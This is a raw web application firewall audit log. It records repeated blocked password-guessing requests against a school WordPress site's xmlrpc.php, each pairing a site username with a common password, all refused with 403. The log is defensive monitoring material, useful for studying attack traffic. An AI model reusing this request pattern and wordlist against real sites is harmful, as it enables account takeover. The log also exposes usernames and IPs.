POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--79f82506-C--
wp.getUsersBlogs
kesiswaan
bonnie
--79f82506-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--79f82506-E--
--79f82506-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779295263293 4356 (- - -)
Stopwatch2: 1744779295263293 4356; combined=3341, p1=351, p2=2766, p3=0, p4=0, p5=155, sr=84, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--79f82506-Z--
--9b85fe03-A--
[16/Apr/2025:11:55:55 +0700] Z_84W5VnVduWmh0dMDMaEgAAAJU 103.236.140.4 45990 103.236.140.4 8181
--9b85fe03-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9b85fe03-C--
wp.getUsersBlogs
timkreatif
servmask
--9b85fe03-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9b85fe03-E--
--9b85fe03-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779355015197 4334 (- - -)
Stopwatch2: 1744779355015197 4334; combined=3400, p1=376, p2=2840, p3=0, p4=0, p5=106, sr=81, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9b85fe03-Z--
--824e1362-A--
[16/Apr/2025:11:56:55 +0700] Z_84lype92T0H9-Aa0zAlAAAAFg 103.236.140.4 46302 103.236.140.4 8181
--824e1362-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--824e1362-C--
wp.getUsersBlogs
timkreatif
marketing_
--824e1362-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--824e1362-E--
--824e1362-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779415226535 4477 (- - -)
Stopwatch2: 1744779415226535 4477; combined=3368, p1=342, p2=2811, p3=0, p4=0, p5=121, sr=80, sw=94, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--824e1362-Z--
--df41471a-A--
[16/Apr/2025:11:57:56 +0700] Z_841Cpe92T0H9-Aa0zBFwAAAEs 103.236.140.4 46598 103.236.140.4 8181
--df41471a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--df41471a-C--
wp.getUsersBlogs
timkreatif
1201230
--df41471a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--df41471a-E--
--df41471a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779476624501 4245 (- - -)
Stopwatch2: 1744779476624501 4245; combined=3229, p1=353, p2=2711, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--df41471a-Z--
--8ec76974-A--
[16/Apr/2025:11:58:56 +0700] Z_85ECpe92T0H9-Aa0zBSwAAAEw 103.236.140.4 46882 103.236.140.4 8181
--8ec76974-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8ec76974-C--
wp.getUsersBlogs
timkreatif
foobar
--8ec76974-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ec76974-E--
--8ec76974-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779536081934 4325 (- - -)
Stopwatch2: 1744779536081934 4325; combined=3383, p1=375, p2=2839, p3=0, p4=0, p5=98, sr=84, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ec76974-Z--
--182b2b0a-A--
[16/Apr/2025:11:59:26 +0700] Z_85Lipe92T0H9-Aa0zBkwAAAEU 103.236.140.4 47038 103.236.140.4 8181
--182b2b0a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--182b2b0a-C--
wp.getUsersBlogs
timkreatif
1234%^&*
--182b2b0a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--182b2b0a-E--
--182b2b0a-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779566337693 4891 (- - -)
Stopwatch2: 1744779566337693 4891; combined=3589, p1=424, p2=2974, p3=0, p4=0, p5=112, sr=86, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--182b2b0a-Z--
--8e8ae10b-A--
[16/Apr/2025:11:59:56 +0700] Z_85TCpe92T0H9-Aa0zB0AAAAEc 103.236.140.4 47188 103.236.140.4 8181
--8e8ae10b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8e8ae10b-C--
wp.getUsersBlogs
timkreatif
dubsmash
--8e8ae10b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8e8ae10b-E--
--8e8ae10b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779596277520 3351 (- - -)
Stopwatch2: 1744779596277520 3351; combined=2525, p1=278, p2=2115, p3=0, p4=0, p5=77, sr=63, sw=55, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8e8ae10b-Z--
--f390456a-A--
[16/Apr/2025:12:00:56 +0700] Z_85iCpe92T0H9-Aa0zCMgAAAEQ 103.236.140.4 47472 103.236.140.4 8181
--f390456a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f390456a-C--
wp.getUsersBlogs
timkreatif
20100728
--f390456a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f390456a-E--
--f390456a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779656307096 4422 (- - -)
Stopwatch2: 1744779656307096 4422; combined=3392, p1=376, p2=2836, p3=0, p4=0, p5=104, sr=83, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f390456a-Z--
--e6360e7a-A--
[16/Apr/2025:12:01:56 +0700] Z_85xCpe92T0H9-Aa0zCfAAAAEs 103.236.140.4 47694 103.236.140.4 8181
--e6360e7a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e6360e7a-C--
wp.getUsersBlogs
timkreatif
rangers1
--e6360e7a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e6360e7a-E--
--e6360e7a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779716251152 4378 (- - -)
Stopwatch2: 1744779716251152 4378; combined=3374, p1=390, p2=2820, p3=0, p4=0, p5=96, sr=83, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e6360e7a-Z--
--a0d63a01-A--
[16/Apr/2025:12:02:56 +0700] Z_86AJVnVduWmh0dMDMa_AAAAIs 103.236.140.4 47982 103.236.140.4 8181
--a0d63a01-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a0d63a01-C--
wp.getUsersBlogs
miswan
miswan2016
--a0d63a01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a0d63a01-E--
--a0d63a01-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779776281761 4207 (- - -)
Stopwatch2: 1744779776281761 4207; combined=3217, p1=359, p2=2692, p3=0, p4=0, p5=97, sr=79, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a0d63a01-Z--
--30936f4d-A--
[16/Apr/2025:12:03:56 +0700] Z_86PCpe92T0H9-Aa0zCpQAAAEg 103.236.140.4 48272 103.236.140.4 8181
--30936f4d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--30936f4d-C--
wp.getUsersBlogs
miswan
trustno1
--30936f4d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--30936f4d-E--
--30936f4d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779836336904 4366 (- - -)
Stopwatch2: 1744779836336904 4366; combined=3420, p1=383, p2=2869, p3=0, p4=0, p5=98, sr=79, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--30936f4d-Z--
--28a2e56d-A--
[16/Apr/2025:12:04:56 +0700] Z_86eCpe92T0H9-Aa0zDEgAAAEA 103.236.140.4 48576 103.236.140.4 8181
--28a2e56d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--28a2e56d-C--
wp.getUsersBlogs
miswan
123465
--28a2e56d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--28a2e56d-E--
--28a2e56d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779896273293 4861 (- - -)
Stopwatch2: 1744779896273293 4861; combined=3425, p1=451, p2=2817, p3=0, p4=0, p5=92, sr=87, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--28a2e56d-Z--
--617b814b-A--
[16/Apr/2025:12:05:56 +0700] Z_86tBk9XPLR9cFiTEvIDQAAAA8 103.236.140.4 48854 103.236.140.4 8181
--617b814b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--617b814b-C--
wp.getUsersBlogs
miswan
852654
--617b814b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--617b814b-E--
--617b814b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744779956132475 4226 (- - -)
Stopwatch2: 1744779956132475 4226; combined=3221, p1=340, p2=2714, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--617b814b-Z--
--4adc240f-A--
[16/Apr/2025:12:06:56 +0700] Z_868Bk9XPLR9cFiTEvIpAAAAAM 103.236.140.4 49168 103.236.140.4 8181
--4adc240f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4adc240f-C--
wp.getUsersBlogs
miswan
qwe123!@#
--4adc240f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4adc240f-E--
--4adc240f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744780016350488 4308 (- - -)
Stopwatch2: 1744780016350488 4308; combined=3240, p1=360, p2=2725, p3=0, p4=0, p5=90, sr=81, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4adc240f-Z--
--9b57f96b-A--
[16/Apr/2025:12:06:56 +0700] Z_868Bk9XPLR9cFiTEvIpQAAAAI 103.236.140.4 49170 103.236.140.4 8181
--9b57f96b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9b57f96b-C--
wp.getUsersBlogs
miswan
1234%^&*
--9b57f96b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9b57f96b-E--
--9b57f96b-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744780016697472 4288 (- - -)
Stopwatch2: 1744780016697472 4288; combined=3293, p1=340, p2=2780, p3=0, p4=0, p5=103, sr=78, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9b57f96b-Z--
--f2ceae2c-A--
[16/Apr/2025:12:07:57 +0700] Z_87LRk9XPLR9cFiTEvJGQAAAAQ 103.236.140.4 49460 103.236.140.4 8181
--f2ceae2c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f2ceae2c-C--
wp.getUsersBlogs
miswan
Testing1
--f2ceae2c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
